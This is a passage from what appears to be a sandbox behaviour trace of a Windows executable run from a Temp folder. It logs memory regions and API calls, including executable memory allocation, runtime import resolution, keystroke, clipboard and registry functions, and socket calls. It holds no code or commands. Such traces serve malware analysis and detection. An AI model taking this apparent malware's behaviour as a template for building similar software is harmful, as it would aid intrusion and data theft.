4807 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 4808 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 4809 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 4810 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 4811 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 4812 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 4813 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 4814 start_va = 0x3c0000 end_va = 0x3c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 4815 start_va = 0xa10000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 4816 start_va = 0xa10000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 4817 start_va = 0xa10000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 4818 start_va = 0xa10000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 4819 start_va = 0xa10000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 4820 start_va = 0xa10000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 4821 start_va = 0xa10000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 4822 start_va = 0x73550000 end_va = 0x73552fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 4840 start_va = 0x3600000 end_va = 0x361ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Thread: id = 158 os_tid = 0xfb4 [0240.180] VirtualAlloc (lpAddress=0x0, dwSize=0x60000, flAllocationType=0x1000, flProtect=0x40) returned 0x220000 [0240.770] VirtualAlloc (lpAddress=0x0, dwSize=0x60000, flAllocationType=0x1000, flProtect=0x40) returned 0x300000 [0240.775] VirtualFree (lpAddress=0x220000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0240.787] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0240.787] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0240.787] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0240.787] VirtualAlloc (lpAddress=0x0, dwSize=0x546, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0240.787] VirtualFree (lpAddress=0x220000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0240.788] VirtualAlloc (lpAddress=0x0, dwSize=0x44400, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0240.814] VirtualFree (lpAddress=0x220000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0240.819] VirtualAlloc (lpAddress=0x0, dwSize=0x1600, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0240.820] VirtualFree (lpAddress=0x220000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0240.820] VirtualAlloc (lpAddress=0x0, dwSize=0x1400, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0240.820] VirtualFree (lpAddress=0x220000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0240.821] VirtualAlloc (lpAddress=0x0, dwSize=0x3400, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0240.822] VirtualFree (lpAddress=0x220000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0240.823] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0240.823] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentThreadId") returned 0x769c1430 [0240.823] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteCriticalSection") returned 0x77a145f5 [0240.823] GetProcAddress (hModule=0x769b0000, lpProcName="LeaveCriticalSection") returned 0x77a02270 [0240.823] GetProcAddress (hModule=0x769b0000, lpProcName="EnterCriticalSection") returned 0x77a022b0 [0240.823] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeCriticalSection") returned 0x77a12c42 [0240.823] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0240.823] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0240.823] GetProcAddress (hModule=0x769b0000, lpProcName="LocalFree") returned 0x769c2cec [0240.823] GetProcAddress (hModule=0x769b0000, lpProcName="LocalAlloc") returned 0x769c166c [0240.823] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualQuery") returned 0x769c4412 [0240.823] GetProcAddress (hModule=0x769b0000, lpProcName="WideCharToMultiByte") returned 0x769c16ed [0240.824] GetProcAddress (hModule=0x769b0000, lpProcName="MultiByteToWideChar") returned 0x769c190e [0240.824] GetProcAddress (hModule=0x769b0000, lpProcName="lstrlenA") returned 0x769c5a03 [0240.824] GetProcAddress (hModule=0x769b0000, lpProcName="lstrcpynA") returned 0x769d18e2 [0240.824] GetProcAddress (hModule=0x769b0000, lpProcName="lstrcpyA") returned 0x769e2a6d [0240.824] GetProcAddress (hModule=0x769b0000, lpProcName="LoadLibraryExA") returned 0x769c48cb [0240.824] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadLocale") returned 0x769c357f [0240.824] GetProcAddress (hModule=0x769b0000, lpProcName="GetStartupInfoA") returned 0x769c0e00 [0240.824] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0240.824] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleA") returned 0x769c1245 [0240.824] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0240.824] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocaleInfoA") returned 0x769dd5b5 [0240.824] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0240.824] GetProcAddress (hModule=0x769b0000, lpProcName="GetCommandLineA") returned 0x769c5159 [0240.824] GetProcAddress (hModule=0x769b0000, lpProcName="FreeLibrary") returned 0x769c3478 [0240.825] GetProcAddress (hModule=0x769b0000, lpProcName="FindFirstFileA") returned 0x769ce286 [0240.825] GetProcAddress (hModule=0x769b0000, lpProcName="FindClose") returned 0x769c43fa [0240.825] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0240.825] GetProcAddress (hModule=0x769b0000, lpProcName="WriteFile") returned 0x769c1282 [0240.825] GetProcAddress (hModule=0x769b0000, lpProcName="UnhandledExceptionFilter") returned 0x769e76f7 [0240.825] GetProcAddress (hModule=0x769b0000, lpProcName="SetFilePointer") returned 0x769c17b1 [0240.825] GetProcAddress (hModule=0x769b0000, lpProcName="SetEndOfFile") returned 0x769dce06 [0240.825] GetProcAddress (hModule=0x769b0000, lpProcName="RtlUnwind") returned 0x769ed1b3 [0240.825] GetProcAddress (hModule=0x769b0000, lpProcName="ReadFile") returned 0x769c3e83 [0240.825] GetProcAddress (hModule=0x769b0000, lpProcName="RaiseException") returned 0x769c585e [0240.825] GetProcAddress (hModule=0x769b0000, lpProcName="GetStdHandle") returned 0x769c516b [0240.825] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileSize") returned 0x769c194e [0240.825] GetProcAddress (hModule=0x769b0000, lpProcName="GetSystemTime") returned 0x769c5a4e [0240.825] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileType") returned 0x769c34e1 [0240.825] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0240.826] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0240.826] GetModuleHandleA (lpModuleName="user32.dll") returned 0x773b0000 [0240.826] GetProcAddress (hModule=0x773b0000, lpProcName="GetKeyboardType") returned 0x77409ac4 [0240.826] GetProcAddress (hModule=0x773b0000, lpProcName="LoadStringA") returned 0x773cdb21 [0240.826] GetProcAddress (hModule=0x773b0000, lpProcName="MessageBoxA") returned 0x7741fd1e [0240.826] GetProcAddress (hModule=0x773b0000, lpProcName="CharNextA") returned 0x773c7a1b [0240.826] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76c20000 [0240.826] GetProcAddress (hModule=0x76c20000, lpProcName="RegQueryValueExA") returned 0x76c348ef [0240.826] GetProcAddress (hModule=0x76c20000, lpProcName="RegOpenKeyExA") returned 0x76c34907 [0240.826] GetProcAddress (hModule=0x76c20000, lpProcName="RegCloseKey") returned 0x76c3469d [0240.827] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x757f0000 [0240.827] GetProcAddress (hModule=0x757f0000, lpProcName="VariantChangeTypeEx") returned 0x757f4c28 [0240.827] GetProcAddress (hModule=0x757f0000, lpProcName="VariantCopyInd") returned 0x7580e86c [0240.827] GetProcAddress (hModule=0x757f0000, lpProcName="VariantClear") returned 0x757f3eae [0240.827] GetProcAddress (hModule=0x757f0000, lpProcName="SysStringLen") returned 0x757f4680 [0240.827] GetProcAddress (hModule=0x757f0000, lpProcName="SysFreeString") returned 0x757f3e59 [0240.827] GetProcAddress (hModule=0x757f0000, lpProcName="SysReAllocStringLen") returned 0x757f7810 [0240.827] GetProcAddress (hModule=0x757f0000, lpProcName="SysAllocStringLen") returned 0x757f45d2 [0240.827] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0240.827] GetProcAddress (hModule=0x769b0000, lpProcName="TlsSetValue") returned 0x769c14db [0240.827] GetProcAddress (hModule=0x769b0000, lpProcName="TlsGetValue") returned 0x769c11e0 [0240.827] GetProcAddress (hModule=0x769b0000, lpProcName="TlsFree") returned 0x769c3537 [0240.827] GetProcAddress (hModule=0x769b0000, lpProcName="TlsAlloc") returned 0x769c4965 [0240.828] GetProcAddress (hModule=0x769b0000, lpProcName="LocalFree") returned 0x769c2cec [0240.828] GetProcAddress (hModule=0x769b0000, lpProcName="LocalAlloc") returned 0x769c166c [0240.828] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0240.828] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76c20000 [0240.828] GetProcAddress (hModule=0x76c20000, lpProcName="RegSetValueExA") returned 0x76c314b3 [0240.828] GetProcAddress (hModule=0x76c20000, lpProcName="RegSetValueA") returned 0x76c80e41 [0240.828] GetProcAddress (hModule=0x76c20000, lpProcName="RegQueryValueExA") returned 0x76c348ef [0240.828] GetProcAddress (hModule=0x76c20000, lpProcName="RegQueryInfoKeyA") returned 0x76c2e143 [0240.828] GetProcAddress (hModule=0x76c20000, lpProcName="RegOpenKeyExA") returned 0x76c34907 [0240.828] GetProcAddress (hModule=0x76c20000, lpProcName="RegEnumKeyExA") returned 0x76c31481 [0240.829] GetProcAddress (hModule=0x76c20000, lpProcName="RegCreateKeyExA") returned 0x76c31469 [0240.829] GetProcAddress (hModule=0x76c20000, lpProcName="RegCloseKey") returned 0x76c3469d [0240.829] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0240.829] GetProcAddress (hModule=0x769b0000, lpProcName="WritePrivateProfileStringA") returned 0x769e7018 [0240.829] GetProcAddress (hModule=0x769b0000, lpProcName="WriteFile") returned 0x769c1282 [0240.829] GetProcAddress (hModule=0x769b0000, lpProcName="WaitForSingleObject") returned 0x769c1136 [0240.829] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualUnlock") returned 0x769def11 [0240.829] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualQuery") returned 0x769c4412 [0240.829] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualLock") returned 0x769dec0b [0240.830] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0240.830] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0240.830] GetProcAddress (hModule=0x769b0000, lpProcName="Sleep") returned 0x769c10ff [0240.830] GetProcAddress (hModule=0x769b0000, lpProcName="SetThreadPriority") returned 0x769c326b [0240.830] GetProcAddress (hModule=0x769b0000, lpProcName="SetFilePointer") returned 0x769c17b1 [0240.830] GetProcAddress (hModule=0x769b0000, lpProcName="SetFileAttributesA") returned 0x769deca3 [0240.830] GetProcAddress (hModule=0x769b0000, lpProcName="SetEndOfFile") returned 0x769dce06 [0240.830] GetProcAddress (hModule=0x769b0000, lpProcName="RemoveDirectoryA") returned 0x76a44a5f [0240.830] GetProcAddress (hModule=0x769b0000, lpProcName="ReadFile") returned 0x769c3e83 [0240.831] GetProcAddress (hModule=0x769b0000, lpProcName="QueryPerformanceFrequency") returned 0x769c41a8 [0240.831] GetProcAddress (hModule=0x769b0000, lpProcName="QueryPerformanceCounter") returned 0x769c1705 [0240.831] GetProcAddress (hModule=0x769b0000, lpProcName="LoadLibraryA") returned 0x769c498f [0240.831] GetProcAddress (hModule=0x769b0000, lpProcName="LeaveCriticalSection") returned 0x77a02270 [0240.831] GetProcAddress (hModule=0x769b0000, lpProcName="IsBadReadPtr") returned 0x769ed065 [0240.831] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeCriticalSection") returned 0x77a12c42 [0240.831] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalUnlock") returned 0x769dcfb4 [0240.831] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalHandle") returned 0x769ed26c [0240.831] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalLock") returned 0x769dd077 [0240.831] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalFree") returned 0x769c5510 [0240.831] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalAlloc") returned 0x769c5846 [0240.832] GetProcAddress (hModule=0x769b0000, lpProcName="GetWindowsDirectoryA") returned 0x769e2ada [0240.832] GetProcAddress (hModule=0x769b0000, lpProcName="GetVolumeInformationA") returned 0x769e6d9b [0240.832] GetProcAddress (hModule=0x769b0000, lpProcName="GetVersionExA") returned 0x769c34c9 [0240.832] GetProcAddress (hModule=0x769b0000, lpProcName="GetVersion") returned 0x769c441f [0240.832] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadPriority") returned 0x769c4377 [0240.832] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadLocale") returned 0x769c357f [0240.832] GetProcAddress (hModule=0x769b0000, lpProcName="GetTempPathA") returned 0x769e273c [0240.832] GetProcAddress (hModule=0x769b0000, lpProcName="GetTempFileNameA") returned 0x769e9d0f [0240.832] GetProcAddress (hModule=0x769b0000, lpProcName="GetSystemInfo") returned 0x769c4982 [0240.832] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0240.833] GetProcAddress (hModule=0x769b0000, lpProcName="GetPrivateProfileStringA") returned 0x769d1804 [0240.833] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleA") returned 0x769c1245 [0240.833] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0240.833] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocaleInfoA") returned 0x769dd5b5 [0240.833] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocalTime") returned 0x769c5a5e [0240.833] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0240.833] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileSize") returned 0x769c194e [0240.833] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileAttributesA") returned 0x769c53cc [0240.833] GetProcAddress (hModule=0x769b0000, lpProcName="GetExitCodeProcess") returned 0x769d1705 [0240.833] GetProcAddress (hModule=0x769b0000, lpProcName="GetDriveTypeA") returned 0x769def45 [0240.833] GetProcAddress (hModule=0x769b0000, lpProcName="GetDiskFreeSpaceA") returned 0x76a448df [0240.834] GetProcAddress (hModule=0x769b0000, lpProcName="GetDateFormatA") returned 0x769ea939 [0240.834] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentThreadId") returned 0x769c1430 [0240.834] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentThread") returned 0x769c17cc [0240.834] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentProcess") returned 0x769c17e9 [0240.834] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentDirectoryA") returned 0x769ed4e6 [0240.834] GetProcAddress (hModule=0x769b0000, lpProcName="GetCPInfo") returned 0x769c5141 [0240.834] GetProcAddress (hModule=0x769b0000, lpProcName="FreeLibrary") returned 0x769c3478 [0240.834] GetProcAddress (hModule=0x769b0000, lpProcName="FormatMessageA") returned 0x769e5f8d [0240.834] GetProcAddress (hModule=0x769b0000, lpProcName="FindNextFileA") returned 0x769ed52e [0240.834] GetProcAddress (hModule=0x769b0000, lpProcName="FindFirstFileA") returned 0x769ce286 [0240.834] GetProcAddress (hModule=0x769b0000, lpProcName="FindClose") returned 0x769c43fa [0240.835] GetProcAddress (hModule=0x769b0000, lpProcName="FileTimeToLocalFileTime") returned 0x769ce256 [0240.835] GetProcAddress (hModule=0x769b0000, lpProcName="FileTimeToDosDateTime") returned 0x769dc845 [0240.835] GetProcAddress (hModule=0x769b0000, lpProcName="ExpandEnvironmentStringsA") returned 0x769deb09 [0240.835] GetProcAddress (hModule=0x769b0000, lpProcName="ExitProcess") returned 0x769c79c8 [0240.835] GetProcAddress (hModule=0x769b0000, lpProcName="EnumCalendarInfoA") returned 0x769e9e40 [0240.835] GetProcAddress (hModule=0x769b0000, lpProcName="EnterCriticalSection") returned 0x77a022b0 [0240.835] GetProcAddress (hModule=0x769b0000, lpProcName="DeviceIoControl") returned 0x769c31df [0240.835] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteFileA") returned 0x769c53fc [0240.835] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteCriticalSection") returned 0x77a145f5 [0240.835] GetProcAddress (hModule=0x769b0000, lpProcName="CreateProcessA") returned 0x769c1072 [0240.835] GetProcAddress (hModule=0x769b0000, lpProcName="CreateFileA") returned 0x769c537e [0240.836] GetProcAddress (hModule=0x769b0000, lpProcName="CreateEventA") returned 0x769c323c [0240.836] GetProcAddress (hModule=0x769b0000, lpProcName="CreateDirectoryA") returned 0x769ed516 [0240.836] GetProcAddress (hModule=0x769b0000, lpProcName="CopyFileA") returned 0x769e58b5 [0240.836] GetProcAddress (hModule=0x769b0000, lpProcName="CompareStringA") returned 0x769c3c0a [0240.836] GetProcAddress (hModule=0x769b0000, lpProcName="CloseHandle") returned 0x769c13f0 [0240.836] GetModuleHandleA (lpModuleName="version.dll") returned 0x0 [0240.836] LoadLibraryA (lpLibFileName="version.dll") returned 0x74520000 [0240.839] GetProcAddress (hModule=0x74520000, lpProcName="VerQueryValueA") returned 0x74521b72 [0240.839] GetProcAddress (hModule=0x74520000, lpProcName="GetFileVersionInfoSizeA") returned 0x74521c9c [0240.839] GetProcAddress (hModule=0x74520000, lpProcName="GetFileVersionInfoA") returned 0x74521ced [0240.839] GetModuleHandleA (lpModuleName="gdi32.dll") returned 0x77240000 [0240.839] GetProcAddress (hModule=0x77240000, lpProcName="SetBkMode") returned 0x772551a2 [0240.839] GetProcAddress (hModule=0x77240000, lpProcName="GetStockObject") returned 0x77254eb8 [0240.840] GetProcAddress (hModule=0x77240000, lpProcName="CreateFontA") returned 0x7725d0e8 [0240.840] GetProcAddress (hModule=0x77240000, lpProcName="CreateDIBitmap") returned 0x77257217 [0240.840] GetModuleHandleA (lpModuleName="user32.dll") returned 0x773b0000 [0240.840] GetProcAddress (hModule=0x773b0000, lpProcName="TranslateMessage") returned 0x773c7809 [0240.840] GetProcAddress (hModule=0x773b0000, lpProcName="ShowWindow") returned 0x773d0dfb [0240.840] GetProcAddress (hModule=0x773b0000, lpProcName="SetWindowTextA") returned 0x773d7aee [0240.840] GetProcAddress (hModule=0x773b0000, lpProcName="SetWindowPos") returned 0x773c8e4e [0240.840] GetProcAddress (hModule=0x773b0000, lpProcName="SetFocus") returned 0x773d2175 [0240.840] GetProcAddress (hModule=0x773b0000, lpProcName="SetDlgItemTextA") returned 0x773dc4d6 [0240.841] GetProcAddress (hModule=0x773b0000, lpProcName="SetClipboardData") returned 0x77408e57 [0240.841] GetProcAddress (hModule=0x773b0000, lpProcName="SendMessageA") returned 0x773d612e [0240.841] GetProcAddress (hModule=0x773b0000, lpProcName="SendDlgItemMessageA") returned 0x773ec112 [0240.841] GetProcAddress (hModule=0x773b0000, lpProcName="RegisterClassA") returned 0x773d434b [0240.841] GetProcAddress (hModule=0x773b0000, lpProcName="PostQuitMessage") returned 0x773c9abb [0240.841] GetProcAddress (hModule=0x773b0000, lpProcName="PeekMessageA") returned 0x773d5f74 [0240.841] GetProcAddress (hModule=0x773b0000, lpProcName="OpenClipboard") returned 0x773d8ecb [0240.841] GetProcAddress (hModule=0x773b0000, lpProcName="MsgWaitForMultipleObjects") returned 0x773d0b4a [0240.841] GetProcAddress (hModule=0x773b0000, lpProcName="MessageBoxA") returned 0x7741fd1e [0240.841] GetProcAddress (hModule=0x773b0000, lpProcName="LoadStringA") returned 0x773cdb21 [0240.841] GetProcAddress (hModule=0x773b0000, lpProcName="LoadIconA") returned 0x773cdafb [0240.841] GetProcAddress (hModule=0x773b0000, lpProcName="LoadCursorA") returned 0x773cdad5 [0240.842] GetProcAddress (hModule=0x773b0000, lpProcName="IsClipboardFormatAvailable") returned 0x773d8676 [0240.842] GetProcAddress (hModule=0x773b0000, lpProcName="GetWindowTextA") returned 0x773d0029 [0240.842] GetProcAddress (hModule=0x773b0000, lpProcName="GetWindowRect") returned 0x773c7f34 [0240.842] GetProcAddress (hModule=0x773b0000, lpProcName="GetSystemMetrics") returned 0x773c7d2f [0240.842] GetProcAddress (hModule=0x773b0000, lpProcName="GetMessageA") returned 0x773c7bd3 [0240.842] GetProcAddress (hModule=0x773b0000, lpProcName="GetFocus") returned 0x773d0dee [0240.842] GetProcAddress (hModule=0x773b0000, lpProcName="GetDlgItemTextA") returned 0x77426b36 [0240.842] GetProcAddress (hModule=0x773b0000, lpProcName="GetDlgItem") returned 0x773ef1ba [0240.842] GetProcAddress (hModule=0x773b0000, lpProcName="GetDesktopWindow") returned 0x773d0a19 [0240.842] GetProcAddress (hModule=0x773b0000, lpProcName="GetDC") returned 0x773c72c4 [0240.842] GetProcAddress (hModule=0x773b0000, lpProcName="GetAsyncKeyState") returned 0x773eeb96 [0240.842] GetProcAddress (hModule=0x773b0000, lpProcName="GetActiveWindow") returned 0x773ef5c7 [0240.843] GetProcAddress (hModule=0x773b0000, lpProcName="EndDialog") returned 0x773eb99c [0240.843] GetProcAddress (hModule=0x773b0000, lpProcName="EnableWindow") returned 0x773d2da4 [0240.843] GetProcAddress (hModule=0x773b0000, lpProcName="EmptyClipboard") returned 0x77427cb9 [0240.843] GetProcAddress (hModule=0x773b0000, lpProcName="DispatchMessageA") returned 0x773c7bbb [0240.843] GetProcAddress (hModule=0x773b0000, lpProcName="DialogBoxIndirectParamA") returned 0x7740ce64 [0240.843] GetProcAddress (hModule=0x773b0000, lpProcName="DestroyWindow") returned 0x773c9a55 [0240.843] GetProcAddress (hModule=0x773b0000, lpProcName="DefWindowProcA") returned 0x77a224e0 [0240.843] GetProcAddress (hModule=0x773b0000, lpProcName="CreateWindowExA") returned 0x773cd22e [0240.843] GetProcAddress (hModule=0x773b0000, lpProcName="CloseClipboard") returned 0x773d8e8d [0240.843] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76e80000 [0240.843] GetProcAddress (hModule=0x76e80000, lpProcName="CoCreateGuid") returned 0x76ec15d5 [0240.844] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0240.844] GetProcAddress (hModule=0x769b0000, lpProcName="GetVersionExA") returned 0x769c34c9 [0240.844] GetModuleHandleA (lpModuleName="wsock32.dll") returned 0x0 [0240.844] LoadLibraryA (lpLibFileName="wsock32.dll") returned 0x753f0000 [0240.848] GetProcAddress (hModule=0x753f0000, lpProcName="ioctlsocket") returned 0x75613084 [0240.848] GetProcAddress (hModule=0x753f0000, lpProcName="WSACancelBlockingCall") returned 0x75625343 [0240.849] GetProcAddress (hModule=0x753f0000, lpProcName="WSAIsBlocking") returned 0x756253be [0240.849] GetProcAddress (hModule=0x753f0000, lpProcName="gethostbyname") returned 0x75627673 [0240.849] GetProcAddress (hModule=0x753f0000, lpProcName="send") returned 0x75616f01 [0240.849] GetProcAddress (hModule=0x753f0000, lpProcName="recv") returned 0x753f17a8 [0240.849] GetProcAddress (hModule=0x753f0000, lpProcName="connect") returned 0x75616bdd [0240.849] GetProcAddress (hModule=0x753f0000, lpProcName="WSACleanup") returned 0x75613c5f [0240.849] GetProcAddress (hModule=0x753f0000, lpProcName="closesocket") returned 0x75613918 [0240.849] GetProcAddress (hModule=0x753f0000, lpProcName="shutdown") returned 0x7561449d [0240.850] GetProcAddress (hModule=0x753f0000, lpProcName="socket") returned 0x75613eb8 [0240.850] GetProcAddress (hModule=0x753f0000, lpProcName="WSAStartup") returned 0x75613ab2 [0240.856] GetModuleFileNameA (in: hModule=0x300000, lpFilename=0x18fde8, nSize=0x105 | out: lpFilename="\n" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\\n")) returned 0x0 [0240.902] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18fcc3, nSize=0x105 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\69be.exe")) returned 0x2d [0240.902] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18fdd8 | out: phkResult=0x18fdd8*=0x0) returned 0x2 [0240.902] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18fdd8 | out: phkResult=0x18fdd8*=0x0) returned 0x2 [0240.903] lstrcpyA (in: lpString1=0x18fcc3, lpString2="\n" | out: lpString1="\n") returned="\n" [0240.903] GetThreadLocale () returned 0x409 [0240.903] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18fdd3, cchData=5 | out: lpLCData="ENU") returned 4 [0240.905] lstrlenA (lpString="\n") returned 1 [0240.916] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0xa84358 [0240.925] GetKeyboardType (nTypeFlag=0) returned 4 [0240.926] GetCommandLineA () returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE.exe" [0240.926] GetStartupInfoA (in: lpStartupInfo=0x18fe78 | out: lpStartupInfo=0x18fe78*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\69BE.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0240.926] GetCurrentThreadId () returned 0xfb4 [0240.933] LoadStringA (in: hInstance=0x300000, uID=0xffdc, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.933] LoadStringA (in: hInstance=0x300000, uID=0xffdb, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.933] LoadStringA (in: hInstance=0x300000, uID=0xffd9, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.933] LoadStringA (in: hInstance=0x300000, uID=0xffda, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.933] LoadStringA (in: hInstance=0x300000, uID=0xffd8, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.933] LoadStringA (in: hInstance=0x300000, uID=0xffd7, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.933] LoadStringA (in: hInstance=0x300000, uID=0xffd6, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.933] LoadStringA (in: hInstance=0x300000, uID=0xffd3, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.933] LoadStringA (in: hInstance=0x300000, uID=0xffd2, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.933] LoadStringA (in: hInstance=0x300000, uID=0xffd1, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.933] LoadStringA (in: hInstance=0x300000, uID=0xffea, lpBuffer=0x18faac, cchBufferMax=1024 | out: lpBuffer="") returned 0x0 [0240.934] LoadStringA (in: hInstance=0x300000, 